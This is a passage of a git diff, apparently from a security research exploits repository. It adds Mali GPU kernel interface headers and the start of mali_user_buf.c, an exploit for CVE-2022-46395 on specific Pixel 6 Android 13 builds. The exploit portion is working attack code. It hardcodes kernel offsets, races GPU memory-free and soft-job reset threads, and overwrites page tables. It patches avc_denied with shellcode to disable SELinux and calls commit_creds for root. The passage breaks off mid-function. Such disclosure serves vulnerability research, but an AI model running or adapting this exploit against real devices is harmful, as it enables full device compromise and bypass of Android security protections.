+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ */
+typedef struct base_jd_atom {
+ __u64 seq_nr;
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+} base_jd_atom;
+
+struct base_jit_alloc_info {
+ __u64 gpu_alloc_addr;
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u8 id;
+ __u8 bin_id;
+ __u8 max_allocations;
+ __u8 flags;
+ __u8 padding[2];
+ __u16 usage_id;
+ __u64 heap_info_gpu_addr;
+};
+
+struct base_external_resource {
+ __u64 ext_resource;
+};
+
+/* Job chain event code bits
+ * Defines the bits used to create ::base_jd_event_code
+ */
+enum {
+ BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
+ BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
+ /* Event indicates success (SW events only) */
+ BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
+ BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
+ BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
+ BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
+ BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
+ /* Mask to extract the type from an event code */
+ BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
+};
+
+/**
+ * enum base_jd_event_code - Job chain event codes
+ *
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
+ * codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault, because the
+ * job was hard-stopped.
+ * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
+ * 'previous job done'.
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
+ * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
+ * was hard stopped.
+ * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
+ * complete/fail/cancel.
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault,
+ * because the job was hard-stopped.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
+ * codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
+ * Such codes are never returned to
+ * user-space.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
+ * @BASE_JD_EVENT_DONE: atom has completed successfull
+ * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
+ * shall result in a failed atom
+ * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
+ * part of the memory system required to access
+ * job descriptors was not powered on
+ * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
+ * specified affinity mask does not intersect
+ * any available cores
+ * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
+ * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
+ * counter was executed.
+ * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
+ * encoding was executed.
+ * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
+ * the instruction encoding did not match the
+ * instruction type encoded in the program
+ * counter.
+ * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
+ * contained invalid combinations of operands.
+ * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
+ * to access the thread local storage section
+ * of another thread.
+ * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
+ * tried to do an unsupported unaligned memory
+ * access.
+ * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
+ * failed to complete an instruction barrier.
+ * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
+ * contains invalid combinations of data.
+ * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
+ * process a tile that is entirely outside the
+ * bounding box of the frame.
+ * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
+ * has been found that exceeds the virtual
+ * address range.
+ * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
+ * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
+ * the first one the reports an error will set
+ * and return full error information.
+ * Subsequent failing jobs will not update the
+ * error status registers, and may write an
+ * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
+ * physical memory where the original virtual
+ * address is no longer available.
+ * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
+ * has detected that the same line has been
+ * accessed as both shareable and non-shareable
+ * memory from inside the GPU.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
+ * entry at level 1 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
+ * entry at level 2 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
+ * entry at level 3 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
+ * entry at level 4 of the translation table.
+ * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
+ * the permission flags set in translation
+ * table
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
+ * level 0 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
+ * level 1 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
+ * level 2 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
+ * level 3 of the translation tables.
+ * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
+ * translation table entry with the ACCESS_FLAG
+ * bit set to zero in level 0 of the
+ * page table, and the DISABLE_AF_FAULT flag
+ * was not set.
+ * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
+ * grow memory on demand
+ * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
+ * dependencies failed
+ * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
+ * in the atom which overlaps with
+ * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
+ * platform doesn't support the feature specified in
+ * the atom.
+ * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
+ * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
+ * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
+ * to userspace that the KBase context has been
+ * destroyed and Base should stop listening for
+ * further events
+ * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
+ * the GPU has to be retried (but it has not
+ * started) due to e.g., GPU reset
+ * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
+ * the completion of a renderpass. This value
+ * shouldn't be returned to userspace but I haven't
+ * seen where it is reset back to JD_EVENT_DONE.
+ *
+ * HW and low-level SW events are represented by event codes.
+ * The status of jobs which succeeded are also represented by
+ * an event code (see @BASE_JD_EVENT_DONE).
+ * Events are usually reported as part of a &struct base_jd_event.
+ *
+ * The event codes are encoded in the following way:
+ * * 10:0 - subtype
+ * * 12:11 - type
+ * * 13 - SW success (only valid if the SW bit is set)
+ * * 14 - SW event (HW event if not set)
+ * * 15 - Kernel event (should never be seen in userspace)
+ *
+ * Events are split up into ranges as follows:
+ * * BASE_JD_EVENT_RANGE__START
+ * * BASE_JD_EVENT_RANGE__END
+ *
+ * code is in 's range when:
+ * BASE_JD_EVENT_RANGE__START <= code <
+ * BASE_JD_EVENT_RANGE__END
+ *
+ * Ranges can be asserted for adjacency by testing that the END of the previous
+ * is equal to the START of the next. This is useful for optimizing some tests
+ * for range.
+ *
+ * A limitation is that the last member of this enum must explicitly be handled
+ * (with an assert-unreachable statement) in switch statements that use
+ * variables of this type. Otherwise, the compiler warns that we have not
+ * handled that enum value.
+ */
+enum base_jd_event_code {
+ /* HW defined exceptions */
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
+
+ /* non-fatal exceptions */
+ BASE_JD_EVENT_NOT_STARTED = 0x00,
+ BASE_JD_EVENT_DONE = 0x01,
+ BASE_JD_EVENT_STOPPED = 0x03,
+ BASE_JD_EVENT_TERMINATED = 0x04,
+ BASE_JD_EVENT_ACTIVE = 0x08,
+
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
+
+ /* job exceptions */
+ BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
+ BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
+ BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
+ BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
+ BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
+ BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
+ BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
+ BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
+ BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
+ BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
+ BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
+ BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
+ BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
+ BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
+ BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
+ BASE_JD_EVENT_STATE_FAULT = 0x5A,
+ BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
+ BASE_JD_EVENT_UNKNOWN = 0x7F,
+
+ /* GPU exceptions */
+ BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
+ BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
+
+ /* MMU exceptions */
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
+ BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
+ BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
+
+ /* SW defined exceptions */
+ BASE_JD_EVENT_MEM_GROWTH_FAILED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_TIMED_OUT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
+ BASE_JD_EVENT_JOB_CANCELLED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
+ BASE_JD_EVENT_JOB_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
+ BASE_JD_EVENT_PM_EVENT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
+
+ BASE_JD_EVENT_BAG_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
+
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | 0x000,
+
+ BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
+ BASE_JD_SW_EVENT_BAG | 0x000,
+ BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | 0x000,
+ BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
+};
+
+/**
+ * struct base_jd_event_v2 - Event reporting structure
+ *
+ * @event_code: event code.
+ * @atom_number: the atom number that has completed.
+ * @udata: user data.
+ *
+ * This structure is used by the kernel driver to report information
+ * about GPU events. They can either be HW-specific events or low-level
+ * SW events, such as job-chain completion.
+ *
+ * The event code contains an event type field which can be extracted
+ * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
+ */
+struct base_jd_event_v2 {
+ enum base_jd_event_code event_code;
+ base_atom_id atom_number;
+ struct base_jd_udata udata;
+};
+
+/**
+ * struct base_dump_cpu_gpu_counters - Structure for
+ * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
+ * jobs.
+ * @system_time: gpu timestamp
+ * @cycle_counter: gpu cycle count
+ * @sec: cpu time(sec)
+ * @usec: cpu time(usec)
+ * @padding: padding
+ *
+ * This structure is stored into the memory pointed to by the @jc field
+ * of &struct base_jd_atom.
+ *
+ * It must not occupy the same CPU cache line(s) as any neighboring data.
+ * This is to avoid cases where access to pages containing the structure
+ * is shared between cached and un-cached memory regions, which would
+ * cause memory corruption.
+ */
+
+struct base_dump_cpu_gpu_counters {
+ __u64 system_time;
+ __u64 cycle_counter;
+ __u64 sec;
+ __u32 usec;
+ __u8 padding[36];
+};
+
+#endif /* _UAPI_BASE_JM_KERNEL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c
new file mode 100644
index 0000000..624de53
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c
@@ -0,0 +1,670 @@
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "mempool_utils.h"
+#include "mem_write.h"
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define UNMAP_CPU 1
+
+#define UPDATE_CPU 0
+
+#define WAIT_CPU 2
+
+#define NB_PREEMPT_THREAD 32
+
+#define NR_WATCHES 100 //5000
+#define NR_EPFDS 500
+
+#define TEST_ENT 3
+
+#define NSEC_PER_SEC 1000000000UL
+
+#define DEFAULT_WAIT 505
+
+#define CORRUPTED_VA_SIZE 500
+
+#define CORRUPTED_COMMIT_SIZE 10
+
+#define AVC_DENY_2211 0x8d6810
+
+#define SEL_READ_ENFORCE_2211 0x8ea124
+
+#define INIT_CRED_2211 0x2fd1388
+
+#define COMMIT_CREDS_2211 0x17ada4
+
+#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388
+
+#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4
+
+#define AVC_DENY_2212 0x8ba710
+
+#define SEL_READ_ENFORCE_2212 0x8cdfd4
+
+#define INIT_CRED_2212 0x2fd1418
+
+#define COMMIT_CREDS_2212 0x177ee4
+
+#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4
+
+#define AVC_DENY_2301 0x8ba710
+
+#define SEL_READ_ENFORCE_2301 0x8cdfd4
+
+#define INIT_CRED_2301 0x2fd1418
+
+#define COMMIT_CREDS_2301 0x177ee4
+
+#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4
+
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2211;
+
+static uint64_t avc_deny = AVC_DENY_2211;
+
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+static uint32_t root_code[8] = {0};
+
+static uint64_t uevent;
+static uint8_t atom_number = 0;
+static volatile int g_ready_unmap = 0;
+static struct timespec unmap_time;
+static struct timespec finished_fault_time;
+static uint8_t g_initial_read = TEST_ENT;
+static int need_reset_fd = 0;
+static volatile bool success = false;
+static int error_code = 0;
+static struct timespec finished_reset_time;
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
+static uint64_t corrupted_region = 0;
+static uint64_t benchmark_time = DEFAULT_WAIT;
+static uint64_t this_benchmark_time = 0;
+
+#define OFF 4
+
+#define SYSCHK(x) ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+})
+
+
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
+ avc_deny = AVC_DENY_2211;
+ sel_read_enforce = SEL_READ_ENFORCE_2211;
+ fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211, &(root_code[0]));
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
+ avc_deny = AVC_DENY_2212;
+ sel_read_enforce = SEL_READ_ENFORCE_2212;
+ fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212, &(root_code[0]));
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) {
+ avc_deny = AVC_DENY_2301;
+ sel_read_enforce = SEL_READ_ENFORCE_2301;
+ fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301, &(root_code[0]));
+ return;
+ }
+
+ err(1, "unable to match build id\n");
+}
+
+static int io_setup(unsigned nr, aio_context_t *ctxp)
+{
+ return syscall(__NR_io_setup, nr, ctxp);
+}
+
+static int io_destroy(aio_context_t ctx)
+{
+ return syscall(__NR_io_destroy, ctx);
+}
+
+void epoll_add(int epfd, int fd) {
+ struct epoll_event ev = { .events = EPOLLIN };
+ SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev));
+}
+
+struct timespec get_mono_time(void) {
+ struct timespec ts;
+ SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
+ return ts;
+}
+
+inline unsigned long timespec_to_ns(struct timespec ts) {
+ return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec;
+}
+
+void ts_sub(struct timespec *ts, unsigned long nsecs) {
+ if (ts->tv_nsec < nsecs) {
+ ts->tv_sec--;
+ ts->tv_nsec += NSEC_PER_SEC;
+ }
+ ts->tv_nsec -= nsecs;
+}
+void ts_add(struct timespec *ts, unsigned long nsecs) {
+ ts->tv_nsec += nsecs;
+ if (ts->tv_nsec >= NSEC_PER_SEC) {
+ ts->tv_sec++;
+ ts->tv_nsec -= NSEC_PER_SEC;
+ }
+}
+bool ts_is_in_future(struct timespec ts) {
+ struct timespec cur = get_mono_time();
+ if (ts.tv_sec > cur.tv_sec)
+ return true;
+ if (ts.tv_sec < cur.tv_sec)
+ return false;
+ return ts.tv_nsec > cur.tv_nsec;
+}
+
+void setup_timerfd() {
+ int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+ int tfd_dups[NR_WATCHES];
+ for (int i=0; itv_sec < t2->tv_sec) return true;
+ if (t1->tv_sec > t2->tv_sec) return false;
+ return t1->tv_nsec < t2->tv_nsec;
+}
+
+bool before_reset() {
+ return finished_reset_time.tv_sec == 0 || before(&finished_fault_time, &finished_reset_time);
+}
+
+void* unmap_resources(void* args) {
+ uint64_t* arguments = (uint64_t*)args;
+ int mali_fd = (int)(arguments[0]);
+
+ migrate_to_cpu(UNMAP_CPU);
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = (64ul << 12) + 0x1000};
+
+ while (!g_ready_unmap);
+ while (ts_is_in_future(unmap_time));
+ migrate_to_cpu(UNMAP_CPU);
+ g_initial_read = *(volatile uint8_t*)(uevent + OFF);
+ if (g_initial_read != TEST_ENT) return NULL;
+ ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free);
+ finished_fault_time = get_mono_time();
+ if (!before_reset()) return NULL;
+// LOG("finished reset time %ld %ld fault time %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, finished_fault_time.tv_sec, finished_fault_time.tv_nsec);
+ unmap_external_resource(mali_fd, uevent);
+ corrupted_region = (uint64_t)map_gpu(mali_fd, CORRUPTED_VA_SIZE, CORRUPTED_COMMIT_SIZE, false, 1);
+
+// struct timespec time_now = get_mono_time();
+// LOG("finished reset time: %ld %ld, finished map time: %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, time_now.tv_sec, time_now.tv_nsec);
+ return NULL;
+}
+
+void check_success() {
+ if (error_code != 0 || g_initial_read != TEST_ENT) return;
+ if (finished_fault_time.tv_sec == 0) return;
+ if (finished_reset_time.tv_sec < finished_fault_time.tv_sec) return;
+ if (finished_reset_time.tv_sec > finished_fault_time.tv_sec) {
+ success = 1;
+ return;
+ }
+ if (finished_reset_time.tv_sec == finished_fault_time.tv_sec) {
+ if (finished_reset_time.tv_nsec > finished_fault_time.tv_nsec) {
+ success = 1;
+ return;
+ }
+ }
+ return;
+}
+
+void* softjob_reset(void* arg) {
+ uint64_t* arguments = (uint64_t*)arg;
+ uint64_t benchmark = arguments[1];
+ struct timespec start_benchmark_time;
+ struct kbase_ioctl_soft_event_update update= {0};
+ update.event = benchmark ? 0 : uevent + OFF;
+ update.new_status = 0;
+
+ int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+ int tfd_dups[NR_WATCHES];
+ for (int i=0; i> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+ atom_number = write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, atom_number);
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ atom_number = write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, atom_number);
+ return atom_number;
+}
+
+int find_pgd(uint64_t* gpu_addr, int* index) {
+ int ret = -1;
+ for (int pg = 0; pg < CORRUPTED_COMMIT_SIZE; pg++) {
+ for (int i = 0; i < 0x1000/8; i++) {
+ uint64_t entry = gpu_addr[pg * 0x1000/8 + i];
+ if ((entry & 0x443) == 0x443) {
+ *index = i;
+ return pg;
+ }
+ }
+ }
+ return ret;
+}
+
+uint64_t benchmark() {
+ uint64_t time = 0;
+ int num_average = 30;
+ uint64_t arguments[2];
+ int benchmark_fd = open_dev(MALI);
+ setup_mali(benchmark_fd, 0);
+ void* tracking_page2 = setup_tracking_page(benchmark_fd);
+ arguments[0] = benchmark_fd;
+ arguments[1] = 1;
+ for (int i = 0; i < num_average; i++) {
+ softjob_reset(&(arguments[0]));
+ time += this_benchmark_time/100;
+ }
+ printf("benchmark_time %ld\n", time/num_average);
+ close(benchmark_fd);
+ return time/num_average;
+}
+
+int trigger(int mali_fd2) {
+
+ int mali_fd = open_dev(MALI);
+ setup_mali(mali_fd, 0);
+ void* tracking_page = setup_tracking_page(mali_fd);
+
+ aio_context_t ctx = 0;
+ uint32_t nr_events = 128;
+ int ret = io_setup(nr_events, &ctx);
+ if (ret < 0) err(1, "io_setup error\n");
+ char* anon_mapping = (char*)ctx;
+
+ migrate_to_cpu(WAIT_CPU);
+ *(volatile char *)(anon_mapping + OFF) = TEST_ENT;
+
+
+ uint64_t this_addr = (uint64_t)anon_mapping;
+ uint64_t imported_address = mem_import(mali_fd, this_addr);
+ void *gpu_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
+ MAP_SHARED, mali_fd, imported_address);
+ if (gpu_mapping == MAP_FAILED) {
+ err(1, "gpu mapping failed\n");
+ }
+ uint64_t jc = map_resource_job(mali_fd, atom_number++, (uint64_t)gpu_mapping);
+ map_external_resource(mali_fd, (uint64_t)gpu_mapping);
+ release_resource_job(mali_fd, atom_number++, jc);
+ uevent = (uint64_t)gpu_mapping;
+
+ if (io_destroy(ctx) < 0) err(1, "unable to destroy aio ctx\n");
+
+ pthread_t thread;
+ uint64_t args[2];
+ args[0] = mali_fd;
+ args[1] = 0;
+
+ pthread_create(&thread, NULL, &unmap_resources, (void*)&(args[0]));
+ pthread_t thread1;
+ pthread_create(&thread1, NULL, softjob_reset, (void*)&(args[0]));
+ struct sched_param sched_par = {0};
+ pthread_join(thread1, NULL);
+ pthread_join(thread, NULL);
+ check_success();
+
+ if (success) {
+ LOG("finished reset: %ld fault: %ld %ld err %d read %d\n", finished_reset_time.tv_nsec, finished_fault_time.tv_nsec, finished_fault_time.tv_sec, error_code, g_initial_read);
+
+ uint64_t alias_region = access_free_pages(mali_fd, mali_fd2, corrupted_region);
+ int index = 0;
+ int pg = find_pgd((uint64_t*)alias_region, &index);
